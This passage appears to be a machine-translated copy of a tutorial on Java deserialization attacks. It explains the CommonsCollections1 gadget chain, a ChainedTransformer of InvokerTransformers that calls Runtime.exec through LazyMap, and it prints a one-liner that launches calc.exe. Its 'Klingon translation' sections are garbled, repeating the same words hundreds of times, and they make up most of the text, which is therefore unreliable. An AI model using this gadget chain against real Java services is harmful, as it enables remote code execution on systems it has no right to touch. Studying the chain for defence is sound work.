|
|
new Object[]{"getRuntime", new Class[0]}
|
|
),
|
|
|
|
//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
|
|
new InvokerTransformer("invoke",
|
|
new Class[]{Object.class, Object[].class},
|
|
new Object[]{null, new Object[0]}
|
|
),
|
|
|
|
//(4) - Use the Runtime object to call exec with arbitrary commands
|
|
new InvokerTransformer("exec",
|
|
new Class[]{String.class},
|
|
command
|
|
)
|
|
};
|
|
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
|
|
```
|
|
**qaStaHvIS:**
|
|
ghorghDI' code vItlhutlhchuq, vaj vaj jatlhpu' 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'e' vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej v
|
|
```java
|
|
Map map = new HashMap<>();
|
|
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
|
|
lazyMap.get("anything");
|
|
```
|
|
### Klingon Translation:
|
|
|
|
**payload**-Da jImej **Map** chelwI' jatlhlaH. SoH **decorate** DaH **LazyMap**-Daq **jImej** chelwI' je. **code**-Daq vItlhutlh **chained transformers** **lazyMap.factory**-Daq **nIvbogh**-lu'be'lu'chugh **jImej** chelwI' je.
|
|
|
|
### Markdown Translation:
|
|
|
|
In the last section of the payload you can see that a **Map object is created**. Then, the function `decorate` is executed from `LazyMap` with the map object and the chained transformers. From the following code you can see that this will cause the **chained transformers** to be copied inside `lazyMap.factory` attribute.
|
|
```java
|
|
protected LazyMap(Map map, Transformer factory) {
|
|
super(map);
|
|
if (factory == null) {
|
|
throw new IllegalArgumentException("Factory must not be null");
|
|
}
|
|
this.factory = factory;
|
|
}
|
|
```
|
|
jeH lazymap.get("pagh");
|
|
```java
|
|
public Object get(Object key) {
|
|
if (map.containsKey(key) == false) {
|
|
Object value = factory.transform(key);
|
|
map.put(key, value);
|
|
return value;
|
|
}
|
|
return map.get(key);
|
|
}
|
|
```
|
|
'ej vaj code 'oH `transform` DaH
|
|
```java
|
|
public Object transform(Object object) {
|
|
for (int i = 0; i < iTransformers.length; i++) {
|
|
object = iTransformers[i].transform(object);
|
|
}
|
|
return object;
|
|
}
|
|
```
|
|
So, remember that inside **factory** we had saved **`chainedTransformer`** and inside of the **`transform`** function we are **going through all those transformers chained** and executing one after another. The funny thing, is that **each transformer is using `object`** **as input** and **object is the output from the last transformer executed**. Therefore, **all the transforms are chained executing the malicious payload**.
|
|
|
|
### Summary
|
|
|
|
At the end, due to how is lazyMap managing the chained transformers inside the get method, it's like if we were executing the following code:
|
|
|
|
### Klingon Translation
|
|
|
|
So, **factory** vItlhutlh **chainedTransformer** **jatlh** **'e'** **transform** **ghaH** **transformers chained** **ghaH** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **
|
|
```java
|
|
Object value = "someting";
|
|
|
|
value = new ConstantTransformer(Runtime.class).transform(value); //(1)
|
|
|
|
value = new InvokerTransformer("getMethod",
|
|
new Class[]{ String.class, Class[].class},
|
|
new Object[]{"getRuntime", null}
|
|
).transform(value); //(2)
|
|
|
|
value = new InvokerTransformer("invoke",
|
|
new Class[]{Object.class, Object[].class},
|
|
new Object[]{null, new Object[0]}
|
|
).transform(value); //(3)
|
|
|
|
value = new InvokerTransformer("exec",
|
|
new Class[]{String.class},
|
|
command
|
|
).transform(value); //(4)
|
|
```
|
|
_Note how `value` is the input of each transform and the output of the previous transform, allowing the execution of a one-liner:_
|
|
|
|
---
|
|
|
|
_Notev pagh `value` vItlhutlh vay' vItlhutlh transform'e' 'ej vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh 'ej vItlhutlh transform'e' vItlhutlh, 'ej vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh,
|
|
```java
|
|
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
|
|
```
|
|
Qapla'! Qatlh **gadgets** vItlhutlh **ComonsCollections1** payload **jatlh**. 'ach **ghaH 'e' vItlhutlh** 'ej **ghaH vItlhutlh**. [**ysoserial** vItlhutlh** 'e'** (https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), **payload** vItlhutlh** 'e'** 'ej **'e' vItlhutlh** `AnnotationInvocationHandler` **'oH** **'e' vItlhutlh**, 'oH **'e' vItlhutlh** **deserialized** **'e'** **'e'** `payload.get()` **vItlhutlh** **'e'** **'e'**.
|
|
|
|
## Java Thread Sleep
|
|
|
|
**web** **vulnerable** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** 